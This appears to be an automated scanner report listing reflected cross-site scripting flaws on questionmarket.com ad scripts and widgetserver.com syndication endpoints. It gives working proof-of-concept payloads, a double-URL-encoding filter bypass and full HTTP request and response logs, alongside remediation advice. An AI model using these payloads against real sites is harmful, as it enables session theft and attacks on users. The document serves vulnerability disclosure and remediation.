Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d05d9'%3balert(1)//d371a7b68b8 was submitted in the lang parameter. This input was echoed as d05d9';alert(1)//d371a7b68b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 12:17:43 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b103.dl Content-Type: text/html Content-Length: 12153
var DL_HideSelects = true; var DL_HideObjects = false; var DL_HideIframes = false; var DL_Banner; // Will be bound to the DIV element representing the layer var DL_ScrollState = 0; var DL_width; var D ...[SNIP]... eyClickthru = 1; } DL_Close(false);
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fe81"%3balert(1)//c8cdb981c7e was submitted in the site parameter. This input was echoed as 8fe81";alert(1)//c8cdb981c7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 12:17:48 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b102.dl Content-Type: text/html Content-Length: 12181
var DL_HideSelects = true; var DL_HideObjects = false; var DL_HideIframes = false; var DL_Banner; // Will be bound to the DIV element representing the layer var DL_ScrollState = 0; var DL_width; var D ...[SNIP]... t); } // Set a flag so animation loop will stop running DL_ScrollState = 2; DL_Scroll(); }
function DL_Adscout(adscout) { (new Image).src="//amch.questionmarket.com/adscgen/adscout_dc.php?site=28fe81";alert(1)//c8cdb981c7e&code=&survey_num=920737&ord="+Math.floor((new Date()).getTime()); }
function DL_Add(){ DL_InsertSwf(); }
function DL_FlashInstalled() { // Detect swf plugin.
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99db6'%3balert(1)//7d7773fe9e8 was submitted in the site parameter. This input was echoed as 99db6';alert(1)//7d7773fe9e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 12:17:48 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b101.dl Content-Type: text/html Content-Length: 12181
var DL_HideSelects = true; var DL_HideObjects = false; var DL_HideIframes = false; var DL_Banner; // Will be bound to the DIV element representing the layer var DL_ScrollState = 0; var DL_width; var D ...[SNIP]...
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85199'-alert(1)-'3cdbb99b00a was submitted in the lang parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 12:17:55 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b202.dl Set-Cookie: LP=1315138675; expires=Thu, 08 Sep 2011 16:17:55 GMT; path=/; domain=.questionmarket.com Content-Length: 2472 Content-Type: text/html
(function(){ var d=document,w=window,dle;
function ff(){ var p=w.parent,r;
while (p != top) { try { if (p.location.host == w.location.host) r = p.document.referrer; } catch (e) { }
p = p.paren ...[SNIP]... } df=biggestframe; } d=df.document; if (!df.DL_already_ran){ dle=d.createElement('script'); dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=920737&lang=85199'-alert(1)-'3cdbb99b00a&from_node=29569&site=2'; try { if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) { dle.src=dle.src.replace('d_layer','h_layer'); } } catch (e) ...[SNIP]...
1.5. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://amch.questionmarket.com
Path:
/adscgen/dynamiclink.js.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5593a'-alert(1)-'c198000a41b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5df1f'-alert(1)-'e9ed9649ab5 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 1d748<img%20src%3da%20onerror%3dalert(1)>9663c0e65cc was submitted in the REST URL parameter 14. This input was echoed as 1d748<img src=a onerror=alert(1)>9663c0e65cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/d8f94c34-6faa-457d-a8f4-cd076a3d47a2/iv/32/p/3/r/281404f0-ed39-48e6-b126-8b7c6b815cc4/rv/48/t/b8bff2cba70830bda8543e310a09cff0f90a701a000001322ded828c1d748<img%20src%3da%20onerror%3dalert(1)>9663c0e65cc/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 04 Sep 2011 12:19:21 GMT Expires: Wed, 07 Sep 2011 12:18:21 GMT ObjectVersions: [Inst: req 32, db 32]; [Reg: req 48, db 48]; P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web04 Content-Length: 8141
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 885f1<a>a131058bd22 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/d8f94c34-6faa-457d-a8f4-cd076a3d47a2885f1<a>a131058bd22/iv/32/p/3/r/281404f0-ed39-48e6-b126-8b7c6b815cc4/rv/48/t/b8bff2cba70830bda8543e310a09cff0f90a701a000001322ded828c/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 04 Sep 2011 12:18:12 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web15 Content-Length: 1190
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload d769a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efc719fe9e6e was submitted in the REST URL parameter 18. This input was echoed as d769a<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>fc719fe9e6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /syndication/xml/i/386eaecb-7c1a-4679-9118-996ea5217907/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/cb12e89655871f8e7e784dc0c08f77700c4560e6000001322d93b7f5d769a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efc719fe9e6e/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 12:22:33 GMT Expires: Wed, 07 Sep 2011 12:21:33 GMT ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506]; P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web16 Content-Length: 3473
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload af0ec<a>5f02f560c70 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/386eaecb-7c1a-4679-9118-996ea5217907af0ec<a>5f02f560c70/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/cb12e89655871f8e7e784dc0c08f77700c4560e6000001322d93b7f5/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 12:21:17 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web15 Content-Length: 1696
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 720ea%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ec4be2c3bd51 was submitted in the REST URL parameter 18. This input was echoed as 720ea<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>c4be2c3bd51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /syndication/xml/i/50c75bf0-9bd2-4e0d-b0e2-50ade412a01b/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/ea9cc84e81960189044ee72fbaecb29feddefc19000001322dae5ccd720ea%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ec4be2c3bd51/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 12:24:07 GMT Expires: Wed, 07 Sep 2011 12:23:07 GMT ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506]; P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web01 Content-Length: 3473
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c8c38<a>b279ab99d94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/50c75bf0-9bd2-4e0d-b0e2-50ade412a01bc8c38<a>b279ab99d94/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/ea9cc84e81960189044ee72fbaecb29feddefc19000001322dae5ccd/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 12:22:50 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web16 Content-Length: 1696
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload f7074%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e45eea47d5f9 was submitted in the REST URL parameter 18. This input was echoed as f7074<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>45eea47d5f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /syndication/xml/i/5e8294c2-2294-4553-8c7c-48f8c9ba9b95/iv/10/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3f7074%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e45eea47d5f9/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 12:21:17 GMT Expires: Wed, 07 Sep 2011 12:20:17 GMT ObjectVersions: [Inst: req 10, db 10]; [Reg: req 506, db 506]; P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web16 Content-Length: 3475
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 459b4<a>68c24a8a00c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/5e8294c2-2294-4553-8c7c-48f8c9ba9b95459b4<a>68c24a8a00c/iv/10/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 12:20:01 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web02 Content-Length: 1696
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 369f9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e954af5fe941 was submitted in the REST URL parameter 18. This input was echoed as 369f9<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>954af5fe941 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /syndication/xml/i/7c07d8dd-4e86-4b13-a149-43e380ed321d/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773369f9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e954af5fe941/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 12:25:20 GMT Expires: Wed, 07 Sep 2011 12:24:20 GMT ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506]; P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web15 Content-Length: 3473
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7a82<a>c05cd7645ad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/7c07d8dd-4e86-4b13-a149-43e380ed321de7a82<a>c05cd7645ad/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 12:24:02 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web03 Content-Length: 1696
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 87d1a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efda49cd4e59 was submitted in the REST URL parameter 18. This input was echoed as 87d1a<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>fda49cd4e59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /syndication/xml/i/8334ea93-781f-4bce-bc32-094c3ddcee36/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d75687d1a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efda49cd4e59/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 12:23:00 GMT Expires: Wed, 07 Sep 2011 12:22:00 GMT ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506]; P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web16 Content-Length: 3473
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f6ed4<a>4e2f98ce392 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
